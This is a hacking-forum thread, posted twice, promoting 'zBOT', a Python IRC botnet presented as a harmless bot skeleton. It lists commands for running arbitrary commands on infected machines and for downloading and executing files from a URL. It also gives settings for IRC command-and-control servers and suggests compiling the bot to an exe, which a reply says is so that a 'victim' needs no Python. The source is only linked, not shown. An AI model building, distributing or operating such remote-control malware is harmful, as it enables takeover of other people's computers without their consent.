Login Register






zBOT IRC Bot filter_list
Author
Message
zBOT IRC Bot #1
zBOT IRC BOT

A python IRC bot skeleton, very stable and clean.



INFORMATION
This bot is very stable, small and clean. It has a few simple commands listed below.

COMMANDS
Code:
- .cmd all [CMD] Execute [CMD] on all machines, - .cmd [KEY] [CMD] Execute [CMD] on [KEY] machine. - .dl all [URL] Download [URL] and execute file, - .dl [KEY] [URL] Download [URL] and execute a file on [KEY] machine. - .info Information about the bot. - .kill [KEY] Uninstall the bot on [KEY] machine. - .nuke Uninstall the bot.



USAGE
Edit the "zbot.py" file and edit your config. The following is in the config :
Code:
- ircs: IRC Server. - ircp: IRC Port. - ircc: IRC Channel. - ircs_backup: Backup IRC Server. - ircp_backup: Backup IRC Port. - ircc_backup: Backup IRC Channel. - version: zBot Version.

You can use "setup.py" to compile the bot into an exe file, but you must download and install Py2EXE. The bin is under 2MB!





SOURCE CODE
- zbot,py CLICK HERE

- setup.py CLICK HERE

Reply

zBOT IRC Bot #2
zBOT IRC BOT

A python IRC bot skeleton, very stable and clean.



INFORMATION
This bot is very stable, small and clean. It has a few simple commands listed below.

COMMANDS
Code:
- .cmd all [CMD] Execute [CMD] on all machines, - .cmd [KEY] [CMD] Execute [CMD] on [KEY] machine. - .dl all [URL] Download [URL] and execute file, - .dl [KEY] [URL] Download [URL] and execute a file on [KEY] machine. - .info Information about the bot. - .kill [KEY] Uninstall the bot on [KEY] machine. - .nuke Uninstall the bot.



USAGE
Edit the "zbot.py" file and edit your config. The following is in the config :
Code:
- ircs: IRC Server. - ircp: IRC Port. - ircc: IRC Channel. - ircs_backup: Backup IRC Server. - ircp_backup: Backup IRC Port. - ircc_backup: Backup IRC Channel. - version: zBot Version.

You can use "setup.py" to compile the bot into an exe file, but you must download and install Py2EXE. The bin is under 2MB!





SOURCE CODE
- zbot,py CLICK HERE

- setup.py CLICK HERE

Reply

RE: zBOT IRC Bot #3
why do you need a bin to run a python?
"The past does not affect what you will become it only affects who you are."

Reply

RE: zBOT IRC Bot #4
You need a bin to deliver a python's compiled code, if you spread your python code the victim must has python installed in his/her pc and then run the code.. but if you've an exe your victim doesn't need to has python installed in his/her pc..

Reply